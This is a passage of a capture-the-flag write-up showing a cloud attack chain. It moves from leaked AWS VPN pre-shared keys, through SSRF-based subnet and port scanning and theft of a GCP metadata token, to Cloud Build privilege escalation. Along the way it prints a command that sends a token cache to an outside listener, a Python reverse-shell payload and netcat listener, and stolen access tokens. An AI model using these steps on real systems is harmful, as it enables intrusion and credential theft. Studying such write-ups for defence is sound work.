That’s interesting. If the current network has routing to the other VPN subnets, perhaps we can access hosts on the other network too!
Which reminds me, we haven’t checked out the output for the permitted actions – ec2.DescribeRouteTables and ec2.DescribeVpnConnections – just yet, so let’s do that now:

$ aws ec2 describe-vpn-connections
{
    "VpnConnections": [
        {
            "CustomerGatewayConfiguration": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<vpn_connection id=\"vpn-071d320b1122f4c0e\">\n  <customer_gateway_id>cgw-025dc69154fd5cf91</customer_gateway_id>\n  <vpn_gateway_id>vgw-03a9749df3e682e4b</vpn_gateway_id>\n  <vpn_connection_type>ipsec.1</vpn_connection_type>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.118</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.23.247</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.117</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>lROuGqp0zYsQ5PjyJNHlKTFQPz0apIn4</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.238</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.251.166</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.237</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>.BFZUutUl7Y3jA91vU9K6te5y_Q_VM7f</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      
<authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n</vpn_connection>",
            "CustomerGatewayId": "cgw-025dc69154fd5cf91",
            "Category": "VPN",
            "State": "available",
            "Type": "ipsec.1",
            "VpnConnectionId": "vpn-071d320b1122f4c0e",
            "VpnGatewayId": "vgw-03a9749df3e682e4b",
            "Options": {
                "EnableAcceleration": false,
                "StaticRoutesOnly": false,
                "LocalIpv4NetworkCidr": "0.0.0.0/0",
                "RemoteIpv4NetworkCidr": "0.0.0.0/0",
                "TunnelInsideIpVersion": "ipv4"
            },
            "Routes": [],
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "aws-vpn-connection1"
                }
            ],
            "VgwTelemetry": [
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T13:21:11.000Z",
                    "OutsideIpAddress": "54.254.23.247",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                },
                {
                    "AcceptedRouteCount": 1,
                    "LastStatusChange": "2020-12-09T16:20:56.000Z",
                    "OutsideIpAddress": "54.254.251.166",
                    "Status": "UP",
                    "StatusMessage": "1 BGP ROUTES"
                }
            ]
        }
    ]
}

Whoa! That’s a lot of information.

Essentially, the Amazon EC2 instance has a site-to-site IPsec VPN tunnel between 54.254.23.247 (Amazon) and 34.87.151.253 (Google Cloud). This creates a persistent connection between the two Virtual Private Cloud (VPC) networks, allowing access to network resources in the Google Cloud VPC from the Amazon VPC and vice versa.
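
The interesting bits are buried inside the CustomerGatewayConfiguration XML blob. As a rough one-liner (assuming GNU grep), the tunnel endpoints and IKE pre-shared keys can be pulled out like so:

$ aws ec2 describe-vpn-connections \
    --query 'VpnConnections[0].CustomerGatewayConfiguration' --output text \
    | grep -oE '<(ip_address|pre_shared_key)>[^<]+'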

Let’s also view the network routes configured for the Amazon VPC:

$ aws ec2 describe-route-tables
{
    "RouteTables": [
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-f9acc780",
                    "RouteTableId": "rtb-f8d8a19e",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [],
            "RouteTableId": "rtb-f8d8a19e",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.31.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-e15b4f85",
                    "Origin": "CreateRoute",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-66699c00",
            "OwnerId": "843869678166"
        },
        {
            "Associations": [
                {
                    "Main": true,
                    "RouteTableAssociationId": "rtbassoc-04c8bf104c051f5a3",
                    "RouteTableId": "rtb-0723142a5801fe538",
                    "AssociationState": {
                        "State": "associated"
                    }
                }
            ],
            "PropagatingVgws": [
                {
                    "GatewayId": "vgw-03a9749df3e682e4b"
                }
            ],
            "RouteTableId": "rtb-0723142a5801fe538",
            "Routes": [
                {
                    "DestinationCidrBlock": "172.16.0.0/16",
                    "GatewayId": "local",
                    "Origin": "CreateRouteTable",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "0.0.0.0/0",
                    "GatewayId": "igw-0ce84b9afa6a16a08",
                    "Origin": "CreateRoute",
                    "State": "active"
                },
                {
                    "DestinationCidrBlock": "10.240.0.0/24",
                    "GatewayId": "vgw-03a9749df3e682e4b",
                    "Origin": "EnableVgwRoutePropagation",
                    "State": "active"
                }
            ],
            "Tags": [],
            "VpcId": "vpc-09e10b8144ebddec2",
            "OwnerId": "843869678166"
        }
    ]
}

Notice that the route for the subnet 10.240.0.0/24 points at gateway ID vgw-03a9749df3e682e4b, which is also the VpnGatewayId found in the VPN connection details. Since the two networks are connected by the VPN tunnel, we can try to connect to hosts in the VPN network.

To do so, we can leverage the SSRF in the punggol-digital-lock-cors-server application and brute-force against the 10.240.0.0/24 subnet to identify hosts that are alive on the network.

Note: Valid host addresses in 10.240.0.0/24 range from 10.240.0.1 to 10.240.0.254, so we only need to brute-force 254 network hosts.

If a network host is unreachable via SSRF, the response will be extremely delayed. Hence, we can set a timeout of 1 second when performing our brute-force to reduce the scanning time needed.
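
Before reaching for a proper fuzzer, a crude shell loop through the cors-anywhere proxy would also do the job (a minimal sketch; it runs sequentially, so it is much slower than the ffuf run below):

$ for i in $(seq 1 254); do curl -s -o /dev/null -m 1 -w "10.240.0.$i %{http_code}\n" "http://122.248.230.66/http://10.240.0.$i/"; done | grep ' 200$'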

I used ffuf to fuzz the last octet of the IP address:

$ seq 1 254 > octet
$ ffuf -u http://122.248.230.66/http://10.240.0.FUZZ/ -w octet -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.FUZZ/
 :: Wordlist         : FUZZ: octet
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

100                     [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [254/254] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:14] :: Errors: 253 ::

We found an alive network host 10.240.0.100!

Now, we can also enumerate all TCP ports and try to discover any HTTP/HTTPS services that we can interact with:

$ seq 1 65535 > ports
$ ffuf -u http://122.248.230.66/http://10.240.0.100:FUZZ/ -w ports -timeout 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://122.248.230.66/http://10.240.0.100:FUZZ/
 :: Wordlist         : FUZZ: ports
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 1
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

80                      [Status: 200, Size: 364, Words: 105, Lines: 13]
:: Progress: [65535/65535] :: Job [1/1] :: 5041 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Doh! There’s been an HTTP webserver running on port 80 on the host all along!

Exploiting SSRF-as-a-Service (“SaaS”) Application

Internal Web Proxy

Great! We discovered yet another proxy application.

Even if we had not already realised that this network host sits within a Google Cloud VPC, the next step would make that apparent pretty quickly.

Using the proxy, let’s enter http://localhost as the site and see whether the response returns the Internal Web Proxy page itself:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    Failed to parse address "localhost" (error number 0) 
    </body>
</html>

Seems like there are some errors parsing the supplied URL. Maybe a port number needs to be explicitly specified?

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80
<html>
    <head> </head>
    <body> 
        <h4>Internal Web Proxy</h4>
        <p>No more lock down! - by COViD devops team<p>
        <form action="/index.php" method="get">
            <label for="site">Site:</label>
            <input type="text" id="site" name="site">
            <input type="submit" value="Visit">
        </form>
    <br><hr><br>HTTP/1.1 400 Bad Request
Date: Thu, 10 Dec 2020 05:53:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 366
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at gcp-vm-asia-southeast1.asia-southeast1-a.c.stack-the-flags-296309.internal Port 80</address>
</body></html>
    </body>
</html>

Interestingly, we got a 400 Bad Request error, leaking the internal hostname of an instance hosted on GCP Compute Engine (inferred from the gcp-* hostname). If we fix the request by adding a trailing slash to the URL http://122.248.230.66/http://10.240.0.100/index.php?site=http://localhost:80, we can use the Internal Web Proxy application to fetch itself:

Internal Web Proxy

Now, we have a working SSRF within the Google VPC network assigned to the GCP Compute Engine instance! :smile:

Can you smell the flag yet? We are so close to the flag now…
Let’s pause for a minute to see where we are at now:
Attack Path Reaching GCP

Metadata FTW

What’s next? Well, we can enumerate the GCP instance metadata server to get temporary service account credentials.

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/
...
HTTP/1.1 200 OK
Metadata-Flavor: Google
Content-Type: application/text
ETag: 2f6048afc5ce2feb
Date: Thu, 10 Dec 2020 06:16:09 GMT
Server: Metadata Server for VM
Connection: Close
Content-Length: 183
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

attributes/
description
disks/
guest-attributes/
hostname
id
image
licenses/
machine-type
maintenance-event
name
network-interfaces/
preempted
scheduling/
service-accounts/
tags
zone

We see that the deprecated v1beta1 metadata endpoint is still enabled, which is great news for us: that way, we don’t have to set the Metadata-Flavor: Google HTTP header in our requests. There doesn’t appear to be a way to make the Internal Web Proxy application set a custom HTTP header for us, so we won’t be able to fetch metadata from the v1 metadata endpoint via SSRF:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1/
...
HTTP/1.1 403 Forbidden
Metadata-Flavor: Google
Date: Thu, 10 Dec 2020 06:40:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Metadata Server for VM
Connection: Close
Content-Length: 1636
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
...
$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/
...
covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/
default/
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/aliases
...
default
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/scopes
...
https://www.googleapis.com/auth/cloud-platform
...

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/instance/service-accounts/covid-devops@stack-the-flags-296309.iam.gserviceaccount.com/token
...
{"access_token":"ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU","expires_in":3395,"token_type":"Bearer"}
...

Here, we can see that the instance runs as the service account covid-devops@stack-the-flags-296309.iam.gserviceaccount.com. The scope of the service account is cloud-platform, which looks really promising. Lastly, we also managed to fetch the OAuth access token associated with the service account, allowing us to authenticate and perform actions on its behalf.
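
As a sanity check, we can inspect the token’s scopes and remaining lifetime via Google’s tokeninfo endpoint (a quick sketch; substitute <ACCESS_TOKEN> with the token fetched above):

$ curl 'https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=<ACCESS_TOKEN>'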

We will probably also need the project ID, so let’s grab that from the metadata server:

$ curl http://122.248.230.66/http://10.240.0.100/index.php?site=http://169.254.169.254:80/computeMetadata/v1beta1/project/project-id
...

stack-the-flags-296309
...

Enumerating Google Cloud APIs

Looking at the list of Google Cloud APIs, we see that there are many potentially available to us. Note that not all APIs are enabled or accessible to the service account, so we should start by figuring out exactly what we can reach.

Using the GCP’s Identity and Access Management (IAM) API, let’s try to list all roles in the stack-the-flags-296309 project:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "roles": [
    {
      "name": "projects/stack-the-flags-296309/roles/covid_devops",
      "title": "covid-devops",
      "description": "Created on: 2020-11-22",
      "etag": "BwW0oxMMCDU="
    }
  ]
}

That worked! Seems like there’s only the covid_devops role. Let’s try to view the permissions included for the role:

$ curl https://iam.googleapis.com/v1/projects/stack-the-flags-296309/roles/covid_devops?access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
  "name": "projects/stack-the-flags-296309/roles/covid_devops",
  "title": "covid-devops",
  "description": "Created on: 2020-11-22",
  "includedPermissions": [
    "cloudbuild.builds.create",
    "compute.instances.get",
    "compute.projects.get",
    "iam.roles.get",
    "iam.roles.list",
    "storage.buckets.create",
    "storage.buckets.get",
    "storage.buckets.list",
    "storage.objects.create"
  ],
  "etag": "BwW0oxMMCDU="
}

We observe a few interesting permissions for the covid_devops role. Since we are looking for the flag, perhaps the flag is stored as an object in a GCP Cloud Storage bucket. However, note that we only have the following permissions relating to GCP Cloud Storage:

  • storage.buckets.create
  • storage.buckets.get
  • storage.buckets.list
  • storage.objects.create

Without storage.objects.get permission, we may be unable to read objects stored in the bucket. Nonetheless, let’s proceed on to enumerate the list of buckets using GCP’s Cloud Storage API:

$ curl 'https://storage.googleapis.com/storage/v1/b?project=stack-the-flags-296309&access_token=ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU'
{
  "kind": "storage#buckets",
  "items": [
    {
      "kind": "storage#bucket",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key",
      "id": "punggol-digital-lock-key",
      "name": "punggol-digital-lock-key",
      "projectNumber": "605021491171",
      "metageneration": "3",
      "location": "ASIA-SOUTHEAST1",
      "storageClass": "STANDARD",
      "etag": "CAM=",
      "defaultEventBasedHold": false,
      "timeCreated": "2020-11-21T20:14:44.705Z",
      "updated": "2020-11-22T07:53:37.521Z",
      "iamConfiguration": {
        "bucketPolicyOnly": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        },
        "uniformBucketLevelAccess": {
          "enabled": true,
          "lockedTime": "2021-02-20T07:53:37.511Z"
        }
      },
      "locationType": "region",
      "satisfiesPZS": false
    }
  ]
}

We see that there’s a bucket named punggol-digital-lock-key. Perhaps we need to escalate our privileges to another identity that holds the storage.objects.get permission. Reviewing the privileges of the covid_devops role again, the cloudbuild.builds.create IAM permission stands out.
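
Incidentally, if we ever need to confirm whether the token really holds a given permission, the Resource Manager testIamPermissions method answers that directly: it takes a candidate list of permissions and echoes back the ones that are granted. A sketch (again substituting <ACCESS_TOKEN>):

$ curl -X POST -H 'Content-Type: application/json' \
    --data '{"permissions":["storage.objects.get","cloudbuild.builds.create"]}' \
    'https://cloudresourcemanager.googleapis.com/v1/projects/stack-the-flags-296309:testIamPermissions?access_token=<ACCESS_TOKEN>'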

Road to Impersonating the Cloud Build Service Account

Rhino Security Labs wrote an article on a privilege escalation attack using the cloudbuild.builds.create permission, allowing us to obtain temporary credentials for GCP’s Cloud Build service account, which may have greater privileges than our current covid-devops service account.

Rhino Security Labs also created a public GitHub repository for IAM Privilege Escalation in GCP containing the exploit script for escalating privileges via cloudbuild.builds.create permission.

Before we continue, do install the google-api-python-client dependency using:

$ pip3 install google-api-python-client --user

Then, grab the exploit script and run it.
In this example, the listening host is 3.1.33.7 and the listening port is 31337:

$ git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
$ cd GCP-IAM-Privilege-Escalation/ExploitScripts/
$ python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/YTkzZTZmYTMtOWFmOC00YWFjLTg4NTYtNzRlZjlkNGExZGQw",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:13.788132684Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import os;os.system(\"curl -d @/root/tokencache/gsutil_token_cache 3.1.33.7:31337\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/a93e6fa3-9af8-4aac-8856-74ef9d4a1dd0"
        }
    }
}
Web server started at 0.0.0.0:31337.
Waiting for token at 3.1.33.7:31337...

$ 

Strange! The access token for the GCP Cloud Build service account is not returned to us!
Perhaps something went wrong. Let’s modify the script to get a reverse shell and investigate further:

Add this line just before the build_body dict (it builds the Python reverse-shell one-liner from the listener host/port supplied via -i):

command = f'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.ip_port.split(":")[0]}",{args.ip_port.split(":")[1]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

And, replace these lines:

handler = socketserver.TCPServer(('', int(port)),myHandler)
print(f'Web server started at 0.0.0.0:{port}.')
print(f'Waiting for token at {ip}:{port}...\n')
handler.handle_request()

With these:

print(f'Waiting for reverse shell at {ip}:{port}...\n')
import os; os.system(f"nc -lnvp {port}")
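
This swaps the exploit’s token-capture web server for a plain netcat listener, so whatever the injected build step connects back with (in our case, an interactive shell) lands straight in our terminal.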

Then, re-run the script:

$ sudo python3 cloudbuild.builds.create.py -p stack-the-flags-296309 -i 3.1.33.7:31337
No credential file passed in, enter an access token to authenticate? (y/n) y
Enter an access token to use for authentication: ya29.c.Ko0B6AcqN41ISFTTWIiitNsHfjiOeeKUDpQfzuV8pA1Fo6PC1PkjRO_OkjQBXQFcGIAWY-4d03toeSJX9KU-Nwq1W9z31H8psU61-dADX3EzP447Pq5twnpsp144R3IKmriDOdGGtmFRj2IX8oOWacHwyT17lV9t8wne7xjHz_uKK7qSPcTUVo8dkZ4gcPnU
{
    "name": "operations/build/stack-the-flags-296309/MTEzMjBmN2QtNjMzOS00OTMxLTk5NWMtM2ZiZWRkYTNmYWFl",
    "metadata": {
        "@type": "type.googleapis.com/google.devtools.cloudbuild.v1.BuildOperationMetadata",
        "build": {
            "id": "11320f7d-6339-4931-995c-3fbedda3faae",
            "status": "QUEUED",
            "createTime": "2020-12-10T07:15:14.173481293Z",
            "steps": [
                {
                    "name": "python",
                    "args": [
                        "-c",
                        "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"3.1.33.7\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"
                    ],
                    "entrypoint": "python"
                }
            ],
            "timeout": "600s",
            "projectId": "stack-the-flags-296309",
            "logsBucket": "gs://605021491171.cloudbuild-logs.googleusercontent.com",
            "options": {
                "logging": "LEGACY"
            },
            "logUrl": "https://console.cloud.google.com/cloud-build/builds/11320f7d-6339-4931-995c-3fbedda3faae?project=605021491171",
            "queueTtl": "3600s",
            "name": "projects/605021491171/locations/global/builds/11320f7d-6339-4931-995c-3fbedda3faae"
        }
    }
}
Waiting for reverse shell at 3.1.33.7:31337...

Listening on [0.0.0.0] (family 0, port 31337)
Connection from 34.73.245.117 52068 received!
root@aecc318d6dc4:/workspace#

Hooray! We get a root shell! But remember, our goal is not to achieve root on a Cloud Build container, so let’s continue on to get the access token for the Cloud Build service account.

root@aecc318d6dc4:/workspace# cat /root/tokencache/gsutil_token_cache
cat /root/tokencache/gsutil_token_cache
cat: /root/tokencache/gsutil_token_cache: No such file or directory

Oh no. The exploit script failed because the access token cached for use by gsutil is missing!

There are two ways to get the access token from this point on:

  1. Method 1: Query the Metadata Server directly
  2. Method 2: Install the Google Cloud SDK and make gcloud fetch the access token for you

Method 1: Via GCP Instance Metadata Server

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/?recursive=true
{
    "605021491171@cloudbuild.gserviceaccount.com": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    },
    "default": {
        "aliases": ["default"],
        "email": "605021491171@cloudbuild.gserviceaccount.com",
        "scopes": ["https://www.googleapis.com/auth/cloud-platform", "https://www.googleapis.com/auth/cloud-source-tools", "https://www.googleapis.com/auth/userinfo.email"]
    }
}

root@79e8f1cff449:/workspace# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
{"access_token":"ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY","expires_in":3211,"token_type":"Bearer"}

Method 2: Via gcloud

Using the reverse shell, follow the installation steps for the Google Cloud SDK and then run the following command:

root@79e8f1cff449:/workspace# gcloud auth application-default print-access-token
ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY

Getting the Final Flag From Bucket

Awesome! We managed to obtain the temporary access token for the default GCP Cloud Build service account!

Let’s test whether the GCP Cloud Build service account has the storage.objects.list permission by listing the objects in the bucket we found:

$ curl 'https://storage.googleapis.com/storage/v1/b/punggol-digital-lock-key/o?project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY'
{
  "kind": "storage#objects",
  "items": [
    {
      "kind": "storage#object",
      "id": "punggol-digital-lock-key/last_half.txt/1607586270019961",
      "selfLink": "https://www.googleapis.com/storage/v1/b/punggol-digital-lock-key/o/last_half.txt",
      "mediaLink": "https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media",
      "name": "last_half.txt",
      "bucket": "punggol-digital-lock-key",
      "generation": "1607586270019961",
      "metageneration": "1",
      "contentType": "text/plain",
      "storageClass": "STANDARD",
      "size": "17",
      "md5Hash": "WviwTGRF7YEzWXqehPCbHg==",
      "crc32c": "RtRJWw==",
      "etag": "CPmCyMT1wu0CEAE=",
      "timeCreated": "2020-12-10T07:44:30.019Z",
      "updated": "2020-12-10T07:44:30.019Z",
      "timeStorageClassUpdated": "2020-12-10T07:44:30.019Z"
    }
  ]
}

We finally see the second half of the flag stored as an object in the punggol-digital-lock-key bucket!
Does it also have the storage.objects.get permission?

